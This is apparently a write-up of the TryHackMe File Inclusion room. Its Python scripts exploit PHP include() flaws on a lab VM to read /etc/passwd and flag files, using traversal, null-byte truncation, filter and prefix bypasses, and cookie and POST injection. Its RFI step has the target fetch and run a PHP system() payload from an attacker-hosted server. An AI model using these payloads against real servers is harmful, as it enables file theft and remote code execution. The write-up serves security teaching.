TryHackMe — File Inclusion (Using python)

Link: https://tryhackme.com/room/fileinc

This room introduces file inclusion vulnerabilities, which arise when a page builds a file path from user-controlled input: Local File Inclusion (LFI) reads files already on the server, Remote File Inclusion (RFI) makes the server fetch and execute code from an attacker-controlled host, and directory traversal uses `../` sequences to escape the directory the application intended to serve from.

I have solved all the challenges using Python, so feel free to run the code and check whether it works for you as well. Note that the target address (10.10.72.183) and the attacker address used in the RFI step (10.13.22.219) are specific to my session; replace them with your own TryHackMe VM and AttackBox/VPN addresses, and run these scripts only against lab machines you are authorised to test.

Task 1 Introduction

Task 2 Deploy the VM

Task 3 Path Traversal

Task 4 Local File Inclusion — LFI

Lab #1

  • Use the code below to get the flag
import requests 
import re 
# Non-greedy capture of each <code>…</code> body; DOTALL lets a match span newlines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)
 
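def LFI(url, parameter):
    """Probe ``url`` for a local file inclusion via ``parameter`` and dump /etc/passwd.

    An empty value is sent first; a PHP ``Warning`` mentioning ``include()`` in
    the response is taken as the signal that the parameter reaches ``include``.
    A second request then asks for the absolute path ``/etc/passwd`` and prints
    the second ``<code>`` block of the page, which is where the original script
    expects the included file to be rendered.

    Args:
        url: Full URL of the vulnerable page, e.g. ``http://host/lab1.php``.
        parameter: Name of the query-string parameter passed to ``include``.

    Returns:
        The extracted file contents as a string, or ``None`` when no LFI was
        detected or the page did not contain the expected ``<code>`` blocks.
    """
    # Payloads are spliced into the URL by hand rather than via ``params=`` so
    # that characters such as ``%00`` reach the server exactly as written.
    # A timeout keeps the script from hanging forever on a dead VM.
    probe = requests.get(f"{url}?{parameter}=", timeout=10)
    body = probe.content
    if not (probe.status_code == 200 and b"Warning" in body and b"include()" in body):
        return None
    print("*** Found LFI***")
    response = requests.get(f"{url}?{parameter}=/etc/passwd", timeout=10)
    matches = pattern.findall(response.content)
    # Guard the index so an unexpected page layout reports instead of raising IndexError.
    if len(matches) < 2:
        print(f"Unexpected page layout: {len(matches)} <code> block(s) found")
        return None
    leaked = matches[1].decode("utf-8", errors="replace")
    print(leaked)
    return leaked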
 
 
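def main(ip='10.10.72.183'):
    """Check the target is reachable, then run the LFI probe against lab1.php.

    Args:
        ip: Address of the TryHackMe target machine. The default is the
            author's instance and will differ for every deployment.
    """
    base = f"http://{ip}/"
    try:
        # A timeout keeps the script from hanging forever on a dead VM.
        probe = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if probe.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab1.php', 'file')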
 
 
if __name__ == "__main__":
    # Run the lab only when executed directly, not when imported.
    main()

Lab #2

import requests 
import re 
# Captures the path PHP echoes in its include() warning, up to the trailing /&quot;.
pattern = re.compile(rb"include\((.*?)/&quot;", flags=re.DOTALL)
 
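def LFI(url, parameter):
    """Recover the directory lab2.php includes from, by provoking a PHP warning.

    An empty value confirms the parameter reaches ``include()``. A lone ``"`` is
    then sent so the warning echoes the full path it tried to open; the regex
    pulls out everything between ``include(`` and the trailing ``/&quot;``.

    Args:
        url: Full URL of the vulnerable page, e.g. ``http://host/lab2.php``.
        parameter: Name of the query-string parameter passed to ``include``.

    Returns:
        The include directory as a string, or ``None`` if nothing was found.
    """
    # Timeouts keep the script from hanging forever on a dead VM.
    probe = requests.get(f"{url}?{parameter}=", timeout=10)
    body = probe.content
    if not (probe.status_code == 200 and b"Warning" in body and b"include()" in body):
        return None
    print("*** Found Folder***")
    # The quote is spliced in raw so it reaches the server unencoded, exactly
    # as the original hand-built URL sent it.
    response = requests.get(f'{url}?{parameter}="', timeout=10)
    matches = pattern.findall(response.content)
    if not matches:
        print("No include() path found in the warning")
        return None
    folder = matches[0].decode("utf-8", errors="replace")
    print(folder)
    return folder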
 
 
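def main(ip='10.10.72.183'):
    """Check the target is reachable, then run the include-path probe against lab2.php.

    Args:
        ip: Address of the TryHackMe target machine. The default is the
            author's instance and will differ for every deployment.
    """
    base = f"http://{ip}/"
    try:
        # A timeout keeps the script from hanging forever on a dead VM.
        probe = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if probe.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab2.php', 'file')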
 
 
if __name__ == "__main__":
    # Run the lab only when executed directly, not when imported.
    main()

Task 5 Local File Inclusion — LFI #2

Lab #3

import requests 
import re 
# Non-greedy capture of each <code>…</code> body; DOTALL lets a match span newlines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)
 
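def LFI(url, parameter):
    """Exploit lab3.php's include() with a traversal path ending in a null byte.

    An empty value confirms the parameter reaches ``include()``. The payload
    ``../../../../etc/passwd%00`` then climbs out of the include directory; the
    trailing ``%00`` is sent literally so the server decodes it into a NUL,
    which truncates any suffix the script appends (this only works on PHP
    builds old enough to still honour null-byte truncation).

    Args:
        url: Full URL of the vulnerable page, e.g. ``http://host/lab3.php``.
        parameter: Name of the query-string parameter passed to ``include``.

    Returns:
        The extracted file contents as a string, or ``None`` when no LFI was
        detected or the page did not contain the expected ``<code>`` blocks.
    """
    # Hand-built URL (not ``params=``) so ``%00`` is not re-encoded to ``%2500``;
    # timeouts keep the script from hanging forever on a dead VM.
    probe = requests.get(f"{url}?{parameter}=", timeout=10)
    body = probe.content
    if not (probe.status_code == 200 and b"Warning" in body and b"include()" in body):
        return None
    print("*** Found LFI***")
    response = requests.get(f"{url}?{parameter}=../../../../etc/passwd%00", timeout=10)
    matches = pattern.findall(response.content)
    # The original script reads the second <code> block; guard it rather than crash.
    if len(matches) < 2:
        print(f"Unexpected page layout: {len(matches)} <code> block(s) found")
        return None
    leaked = matches[1].decode("utf-8", errors="replace")
    print(leaked)
    return leaked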
 
 
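def main(ip='10.10.72.183'):
    """Check the target is reachable, then run the null-byte LFI probe against lab3.php.

    Args:
        ip: Address of the TryHackMe target machine. The default is the
            author's instance and will differ for every deployment.
    """
    base = f"http://{ip}/"
    try:
        # A timeout keeps the script from hanging forever on a dead VM.
        probe = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if probe.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab3.php', 'file')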
 
 
if __name__ == "__main__":
    # Run the lab only when executed directly, not when imported.
    main()

Lab #4

import requests 
 
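def LFI(url, parameter):
    """Check whether lab4.php reveals that ``parameter`` is passed to file_get_contents().

    Sends an empty value and looks for the function name in the resulting PHP
    warning. Unlike ``include()``, ``file_get_contents()`` reads a file without
    executing it, so this lab is about identifying the sink, not dumping data.

    Args:
        url: Full URL of the vulnerable page, e.g. ``http://host/lab4.php``.
        parameter: Name of the query-string parameter fed to the file function.

    Returns:
        ``True`` when the function name was seen in a 200 response, else ``False``.
    """
    # A timeout keeps the script from hanging forever on a dead VM.
    response = requests.get(f"{url}?{parameter}=", timeout=10)
    if response.status_code == 200 and b"file_get_contents" in response.content:
        print("*** Found Function***")
        print("file_get_contents")
        return True
    return False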
 
 
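def main(ip='10.10.72.183'):
    """Check the target is reachable, then look for the file function used by lab4.php.

    Args:
        ip: Address of the TryHackMe target machine. The default is the
            author's instance and will differ for every deployment.
    """
    base = f"http://{ip}/"
    try:
        # A timeout keeps the script from hanging forever on a dead VM.
        probe = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if probe.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab4.php', 'file')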
 
 
if __name__ == "__main__":
    # Run the lab only when executed directly, not when imported.
    main()

Lab #5

import requests 
import re 
# Non-greedy capture of each <code>…</code> body; DOTALL lets a match span newlines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)
 
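def LFI(url, parameter):
    """Bypass lab5.php's ``../`` stripping with the ``....//`` traversal trick.

    An empty value confirms the parameter reaches ``include()``. The payload
    ``....//....//....//....//etc/passwd`` is built so that, if the filter
    deletes each ``../`` once and does not re-scan, every ``....//`` collapses
    back into ``../`` (presumably the lab's filter is single-pass; verify if the
    dump comes back empty).

    Args:
        url: Full URL of the vulnerable page, e.g. ``http://host/lab5.php``.
        parameter: Name of the query-string parameter passed to ``include``.

    Returns:
        The extracted file contents as a string, or ``None`` when no LFI was
        detected or the page did not contain the expected ``<code>`` blocks.
    """
    # Hand-built URL so the payload reaches the server as written; timeouts keep
    # the script from hanging forever on a dead VM.
    probe = requests.get(f"{url}?{parameter}=", timeout=10)
    body = probe.content
    if not (probe.status_code == 200 and b"Warning" in body and b"include()" in body):
        return None
    print("*** Found LFI***")
    response = requests.get(f"{url}?{parameter}=....//....//....//....//etc/passwd", timeout=10)
    matches = pattern.findall(response.content)
    # The original script reads the second <code> block; guard it rather than crash.
    if len(matches) < 2:
        print(f"Unexpected page layout: {len(matches)} <code> block(s) found")
        return None
    leaked = matches[1].decode("utf-8", errors="replace")
    print(leaked)
    return leaked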
 
 
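def main(ip='10.10.72.183'):
    """Check the target is reachable, then run the filter-bypass LFI probe against lab5.php.

    Args:
        ip: Address of the TryHackMe target machine. The default is the
            author's instance and will differ for every deployment.
    """
    base = f"http://{ip}/"
    try:
        # A timeout keeps the script from hanging forever on a dead VM.
        probe = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if probe.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab5.php', 'file')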
 
 
if __name__ == "__main__":
    # Run the lab only when executed directly, not when imported.
    main()

Lab #6

import requests 
import re 
# Non-greedy capture of each <code>…</code> body; DOTALL lets a match span newlines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)
 
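def LFI(url, parameter):
    """Escape lab6.php's prefix check with traversal after the allowed prefix.

    An empty value that yields ``Access Denied`` is taken as confirmation that
    the parameter is validated. The payload ``THM-profile/../../../../etc/os-release``
    keeps the prefix the lab apparently requires (inferred from the payload,
    not shown in SOURCE) and then climbs out of that directory.

    Args:
        url: Full URL of the vulnerable page, e.g. ``http://host/lab6.php``.
        parameter: Name of the query-string parameter passed to ``include``.

    Returns:
        The extracted file contents as a string, or ``None`` when the probe did
        not match or the page did not contain the expected ``<code>`` blocks.
    """
    # Timeouts keep the script from hanging forever on a dead VM.
    probe = requests.get(f"{url}?{parameter}=", timeout=10)
    if not (probe.status_code == 200 and b"Access Denied" in probe.content):
        return None
    print("*** Found LFI***")
    response = requests.get(f"{url}?{parameter}=THM-profile/../../../../etc/os-release", timeout=10)
    matches = pattern.findall(response.content)
    # The original script reads the second <code> block; guard it rather than crash.
    if len(matches) < 2:
        print(f"Unexpected page layout: {len(matches)} <code> block(s) found")
        return None
    leaked = matches[1].decode("utf-8", errors="replace")
    print(leaked)
    return leaked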
 
 
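def main(ip='10.10.72.183'):
    """Check the target is reachable, then run the prefix-bypass LFI probe against lab6.php.

    Args:
        ip: Address of the TryHackMe target machine. The default is the
            author's instance and will differ for every deployment.
    """
    base = f"http://{ip}/"
    try:
        # A timeout keeps the script from hanging forever on a dead VM.
        probe = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if probe.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab6.php', 'file')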
 
 
if __name__ == "__main__":
    # Run the lab only when executed directly, not when imported.
    main()

Task 6 Remote File Inclusion — RFI

Task 7 Remediation

Task 8 Challenge

flag1

import requests 
import re 
# Non-greedy capture of each <code>…</code> body; DOTALL lets a match span newlines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)
 
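def main(ip='10.10.72.183'):
    """Fetch flag1 by POSTing the absolute path /etc/flag1 to chall1.php's ``file`` field.

    Args:
        ip: Address of the TryHackMe target machine. The default is the
            author's instance and will differ for every deployment.
    """
    url = f"http://{ip}/challenges/chall1.php"
    # This challenge reads the filename from the POST body, not the query string.
    # A timeout keeps the script from hanging forever on a dead VM.
    response = requests.post(url, data={"file": "/etc/flag1"}, timeout=10)
    matches = pattern.findall(response.content)
    # The original script reads the second <code> block; guard it rather than crash.
    if len(matches) < 2:
        print(f"Unexpected page layout: {len(matches)} <code> block(s) found")
        return
    print(matches[1].decode("utf-8", errors="replace"))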
 
if __name__ == '__main__':
    # Run the challenge only when executed directly, not when imported.
    main()

flag2

import requests 
import re 
# Skip past the last </div> inside the <code> element, then capture the rest non-greedily.
pattern = re.compile(rb"<code>.*</div>(.*?)</code>", flags=re.DOTALL)
 
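def main(ip='10.10.72.183'):
    """Fetch flag2 from chall2.php, which takes the file path from the ``THM`` cookie.

    Args:
        ip: Address of the TryHackMe target machine. The default is the
            author's instance and will differ for every deployment.
    """
    url = f"http://{ip}/challenges/chall2.php"
    # The literal "%00" is sent as-is in the cookie and relies on the target
    # decoding it into a NUL to cut off any suffix appended server-side (only
    # PHP builds old enough to honour null-byte truncation will do this).
    # A timeout keeps the script from hanging forever on a dead VM.
    response = requests.get(url, cookies={"THM": "../../../../etc/flag2%00"}, timeout=10)
    matches = pattern.findall(response.content)
    if not matches:
        print("No <code> block found in the response")
        return
    print(matches[0].decode("utf-8", errors="replace"))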
 
if __name__ == '__main__':
    # Run the challenge only when executed directly, not when imported.
    main()

flag3

import requests 
import re 
# Non-greedy capture of each <code>…</code> body; DOTALL lets a match span newlines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)
 
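def main(ip='10.10.72.183'):
    """Fetch flag3 by POSTing a traversal path with a trailing NUL to chall3.php.

    Args:
        ip: Address of the TryHackMe target machine. The default is the
            author's instance and will differ for every deployment.
    """
    url = f"http://{ip}/challenges/chall3.php"
    # A raw "\x00" is used here (not "%00") because requests form-encodes the
    # POST body, turning the NUL into %00 on the wire. Truncation still only
    # works on PHP builds old enough to honour null bytes in paths.
    # A timeout keeps the script from hanging forever on a dead VM.
    response = requests.post(url, data={"file": "../../../../etc/flag3\x00"}, timeout=10)
    matches = pattern.findall(response.content)
    # The original script reads the second <code> block; guard it rather than crash.
    if len(matches) < 2:
        print(f"Unexpected page layout: {len(matches)} <code> block(s) found")
        return
    print(matches[1].decode("utf-8", errors="replace"))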
 
if __name__ == '__main__':
    # Run the challenge only when executed directly, not when imported.
    main()

RCE

rce.txt

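<?php
    // system() already writes the command's output into the response and
    // returns only the last line; echoing that return value as well would
    // print the hostname twice. Serve this file as plain text from the
    // attacker host so the target, not the attacker's server, executes it.
    system('hostname');
?>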

rce.py

import requests 
import re 
# Non-greedy capture of each <code>…</code> body; DOTALL lets a match span newlines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)
 
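def main(target='10.10.72.183', attacker='10.13.22.219:8000'):
    """Trigger RFI on playground.php by including rce.txt served from the attacker host.

    The target must permit remote includes for this to work, and rce.txt must
    be served as plain text (e.g. ``python3 -m http.server 8000`` run in the
    directory holding it) so the PHP is executed by the target rather than by
    the attacker's own web server.

    Args:
        target: Address of the TryHackMe target machine.
        attacker: ``host:port`` the target can reach to fetch rce.txt. Both
            defaults are the author's session values and must be replaced.
    """
    url = f"http://{target}/playground.php?file=http://{attacker}/rce.txt"
    # A timeout keeps the script from hanging forever on a dead VM.
    response = requests.get(url, timeout=10)
    matches = pattern.findall(response.content)
    # The original script reads the second <code> block; guard it rather than crash.
    if len(matches) < 2:
        print(f"Unexpected page layout: {len(matches)} <code> block(s) found")
        return
    print(matches[1].decode("utf-8", errors="replace"))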
 
if __name__ == '__main__':
    # Run the RFI trigger only when executed directly, not when imported.
    main()

Hooray! All flags recovered, and the RFI step shows how a file inclusion bug becomes remote code execution.

Please give me a clap if you found it to be helpful and follow me to get more Security knowledge.